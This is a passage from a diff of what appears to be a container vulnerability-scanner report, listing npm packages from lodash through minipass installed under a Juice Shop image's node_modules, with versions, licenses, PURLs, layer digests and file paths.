"ID": "ljharb-monorepo-symlink-test@0.0.0", + "Name": "ljharb-monorepo-symlink-test", + "Identifier": { + "PURL": "pkg:npm/ljharb-monorepo-symlink-test@0.0.0", + "UID": "f78fb414e8b9deef" + }, + "Version": "0.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/resolve/test/resolver/multirepo/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "locate-path@5.0.0", + "Name": "locate-path", + "Identifier": { + "PURL": "pkg:npm/locate-path@5.0.0", + "UID": "c4caa69f4a013cd7" + }, + "Version": "5.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/replace/node_modules/locate-path/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "lodash@2.4.2", + "Name": "lodash", + "Identifier": { + "PURL": "pkg:npm/lodash@2.4.2", + "UID": "ecfc229aa8403466" + }, + "Version": "2.4.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "lodash@4.18.1", + "Name": "lodash", + "Identifier": { + "PURL": "pkg:npm/lodash@4.18.1", + "UID": "7e305dbe20f77fcc" + }, + "Version": "4.18.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/lodash/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "lodash.isfinite@3.3.2", + "Name": "lodash.isfinite", + "Identifier": { + "PURL": "pkg:npm/lodash.isfinite@3.3.2", + "UID": "711a5a018c5ea79e" + }, + "Version": "3.3.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/lodash.isfinite/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "lodash.set@4.3.2", + "Name": "lodash.set", + "Identifier": { + "PURL": "pkg:npm/lodash.set@4.3.2", + "UID": "e42be95e03ab854d" + }, + "Version": "4.3.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/lodash.set/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "logform@2.7.0", + "Name": "logform", + "Identifier": { + "PURL": "pkg:npm/logform@2.7.0", + "UID": "d6377fd5a5dfdcaa" + }, + "Version": "2.7.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/logform/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "loose-envify@1.4.0", + "Name": "loose-envify", + "Identifier": { + "PURL": "pkg:npm/loose-envify@1.4.0", + "UID": "53a58e921a52720e" + }, + "Version": "1.4.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/loose-envify/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "lowercase-keys@1.0.0", + "Name": "lowercase-keys", + "Identifier": { + "PURL": "pkg:npm/lowercase-keys@1.0.0", + "UID": "21a9e68aaa933c1" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/lowercase-keys/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "lru-cache@10.4.3", + "Name": "lru-cache", + "Identifier": { + "PURL": "pkg:npm/lru-cache@10.4.3", + "UID": "5d8c78a7a4062bb1" + }, + "Version": "10.4.3", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/lru-cache/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "lru-cache@6.0.0", + "Name": "lru-cache", + "Identifier": { + "PURL": "pkg:npm/lru-cache@6.0.0", + "UID": "c91ef41f3bf0d32f" + }, + "Version": "6.0.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/lru-cache/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "make-dir@1.3.0", + "Name": "make-dir", + "Identifier": { + "PURL": "pkg:npm/make-dir@1.3.0", + "UID": "3056347394f22c8c" + }, + "Version": "1.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/decompress/node_modules/make-dir/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "make-dir@2.1.0", + "Name": "make-dir", + "Identifier": { + "PURL": "pkg:npm/make-dir@2.1.0", + "UID": "7c0e627708dea4aa" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/make-dir/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "make-fetch-happen@14.0.3", + "Name": "make-fetch-happen", + "Identifier": { + "PURL": "pkg:npm/make-fetch-happen@14.0.3", + "UID": "ef82e6342fe6ec82" + }, + "Version": "14.0.3", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/make-fetch-happen/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "make-fetch-happen@9.1.0", + "Name": "make-fetch-happen", + "Identifier": { + "PURL": "pkg:npm/make-fetch-happen@9.1.0", + "UID": "e622f19725d1ae8c" + }, + "Version": "9.1.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/make-fetch-happen/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "make-iterator@1.0.1", + "Name": "make-iterator", + "Identifier": { + "PURL": "pkg:npm/make-iterator@1.0.1", + "UID": "2aa6ba3b5461ac99" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/make-iterator/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "make-plural@4.3.0", + "Name": "make-plural", + "Identifier": { + "PURL": "pkg:npm/make-plural@4.3.0", + "UID": "f0ad633af1c7a3ec" + }, + "Version": "4.3.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/messageformat/node_modules/make-plural/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "make-plural@6.2.2", + "Name": "make-plural", + "Identifier": { + "PURL": "pkg:npm/make-plural@6.2.2", + "UID": "d7eac4894a17e0a" + }, + "Version": "6.2.2", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/make-plural/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "map-cache@0.2.2", + "Name": "map-cache", + "Identifier": { + "PURL": "pkg:npm/map-cache@0.2.2", + "UID": "57c3af1ba5c643da" + }, + "Version": "0.2.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/map-cache/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "marsdb@0.6.11", + "Name": "marsdb", + "Identifier": { + "PURL": "pkg:npm/marsdb@0.6.11", + "UID": "fa292712ddb319ba" + }, + "Version": "0.6.11", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/marsdb/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "material-dynamic-colors@1.1.4", + "Name": "material-dynamic-colors", + "Identifier": { + "PURL": "pkg:npm/material-dynamic-colors@1.1.4", + "UID": "a5b56bd416df877d" + }, + "Version": "1.1.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/material-dynamic-colors/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "material-icons@1.13.14", + "Name": "material-icons", + "Identifier": { + "PURL": "pkg:npm/material-icons@1.13.14", + "UID": "ebb010950fd5ad0e" + }, + "Version": "1.13.14", + "Licenses": [ + "Apache-2.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/material-icons/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "math-interval-parser@2.0.1", + "Name": "math-interval-parser", + "Identifier": { + "PURL": "pkg:npm/math-interval-parser@2.0.1", + "UID": "5d22fb943a6ec417" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/math-interval-parser/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "math-intrinsics@1.1.0", + "Name": "math-intrinsics", + "Identifier": { + "PURL": "pkg:npm/math-intrinsics@1.1.0", + "UID": "63ec89f380b60891" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/math-intrinsics/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "media-typer@0.3.0", + "Name": "media-typer", + "Identifier": { + "PURL": "pkg:npm/media-typer@0.3.0", + "UID": "4b475d7bb41e6b66" + }, + "Version": "0.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/media-typer/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "median@0.0.2", + "Name": "median", + "Identifier": { + "PURL": "pkg:npm/median@0.0.2", + "UID": "e6873caf3b1ed349" + }, + "Version": "0.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/median/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "merge-descriptors@1.0.3", + "Name": "merge-descriptors", + "Identifier": { + "PURL": "pkg:npm/merge-descriptors@1.0.3", + "UID": "b7343fa8c1f4eac5" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/merge-descriptors/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "messageformat@2.3.0", + "Name": "messageformat", + "Identifier": { + "PURL": "pkg:npm/messageformat@2.3.0", + "UID": "af2d824ad50e701a" + }, + "Version": "2.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/messageformat/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "messageformat-formatters@2.0.1", + "Name": "messageformat-formatters", + "Identifier": { + "PURL": "pkg:npm/messageformat-formatters@2.0.1", + "UID": "23503390332cb0ac" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/messageformat-formatters/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "messageformat-parser@4.1.3", + "Name": "messageformat-parser", + "Identifier": { + "PURL": "pkg:npm/messageformat-parser@4.1.3", + "UID": "32fe5ef7afad4573" + }, + "Version": "4.1.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/messageformat-parser/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "methods@1.1.2", + "Name": "methods", + "Identifier": { + "PURL": "pkg:npm/methods@1.1.2", + "UID": "95755577d6538bb1" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/methods/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "micromatch@4.0.8", + "Name": "micromatch", + "Identifier": { + "PURL": "pkg:npm/micromatch@4.0.8", + "UID": "c708c30399cbad5f" + }, + "Version": "4.0.8", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/micromatch/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "mime@1.6.0", + "Name": "mime", + "Identifier": { + "PURL": "pkg:npm/mime@1.6.0", + "UID": "b0687c4b45712048" + }, + "Version": "1.6.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/mime/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "mime-db@1.52.0", + "Name": "mime-db", + "Identifier": { + "PURL": "pkg:npm/mime-db@1.52.0", + "UID": "ddc58215258320cd" + }, + "Version": "1.52.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/mime-db/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "mime-types@2.1.35", + "Name": "mime-types", + "Identifier": { + "PURL": "pkg:npm/mime-types@2.1.35", + "UID": "1110087111220533" + }, + "Version": "2.1.35", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/mime-types/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "mimic-response@1.0.1", + "Name": "mimic-response", + "Identifier": { + "PURL": "pkg:npm/mimic-response@1.0.1", + "UID": "4b36b0402037710f" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/mimic-response/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "mimic-response@2.1.0", + "Name": "mimic-response", + "Identifier": { + "PURL": "pkg:npm/mimic-response@2.1.0", + "UID": "bd102106f549b698" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/simple-get/node_modules/mimic-response/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "mimic-response@3.1.0", + "Name": "mimic-response", + "Identifier": { + "PURL": "pkg:npm/mimic-response@3.1.0", + "UID": "a8d1975e42de92f3" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/libxmljs2/node_modules/mimic-response/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "mimic-response@3.1.0", + "Name": "mimic-response", + "Identifier": { + "PURL": "pkg:npm/mimic-response@3.1.0", + "UID": "7c7785025773cf6a" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/mimic-response/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "minimatch@3.0.5", + "Name": "minimatch", + "Identifier": { + "PURL": "pkg:npm/minimatch@3.0.5", + "UID": "1c17cde52495ade5" + }, + "Version": "3.0.5", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/replace/node_modules/minimatch/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "minimatch@3.1.5", + "Name": "minimatch", + "Identifier": { + "PURL": "pkg:npm/minimatch@3.1.5", + "UID": "206bf648977927f0" + }, + "Version": "3.1.5", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/minimatch/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "minimatch@9.0.9", + "Name": "minimatch", + "Identifier": { + "PURL": "pkg:npm/minimatch@9.0.9", + "UID": "534543029dc0cfaf" + }, + "Version": "9.0.9", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/glob/node_modules/minimatch/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "minimist@1.2.8", + "Name": "minimist", + "Identifier": { + "PURL": "pkg:npm/minimist@1.2.8", + "UID": "68e26b1ff365eb46" + }, + "Version": "1.2.8", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/minimist/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "minipass@2.9.0", + "Name": "minipass", + "Identifier": { + "PURL": "pkg:npm/minipass@2.9.0", + "UID": "a03661dab6fdd1d" + }, + "Version": "2.9.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/node-pre-gyp/node_modules/minipass/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "minipass@3.3.6", + "Name": "minipass", + "Identifier": { + "PURL": "pkg:npm/minipass@3.3.6", + "UID": "549d3a839908409d" + }, + "Version": "3.3.6", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/minipass-flush/node_modules/minipass/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "minipass@3.3.6", + "Name": "minipass", + "Identifier": { + "PURL": "pkg:npm/minipass@3.3.6", + "UID": "cddb5df453cd7a1" + }, + "Version": "3.3.6", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/minipass-pipeline/node_modules/minipass/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "minipass@3.3.6", + "Name": "minipass", + "Identifier": { + "PURL": "pkg:npm/minipass@3.3.6", + "UID": "8026cf5be276689c" + }, + "Version": "3.3.6", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/minipass-sized/node_modules/minipass/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "minipass@3.3.6", + "Name": "minipass", + "Identifier": { + "PURL": "pkg:npm/minipass@3.3.6", + "UID": "1045a4a7fa2d45e4" + }, + "Version": "3.3.6", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/minipass/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "minipass@5.0.0", + "Name": "minipass", + "Identifier": { + "PURL": "pkg:npm/minipass@5.0.0", + "UID": "e049a5bf5caa3c63" + }, + "Version": "5.0.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/tar/node_modules/minipass/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "minipass@7.1.3", + "Name": "minipass", + "Identifier": { + "PURL": "pkg:npm/minipass@7.1.3", + "UID": "40eb335b13cc262a" + }, + "Version": "7.1.3", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/minipass/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "minipass-collect@1.0.2", + 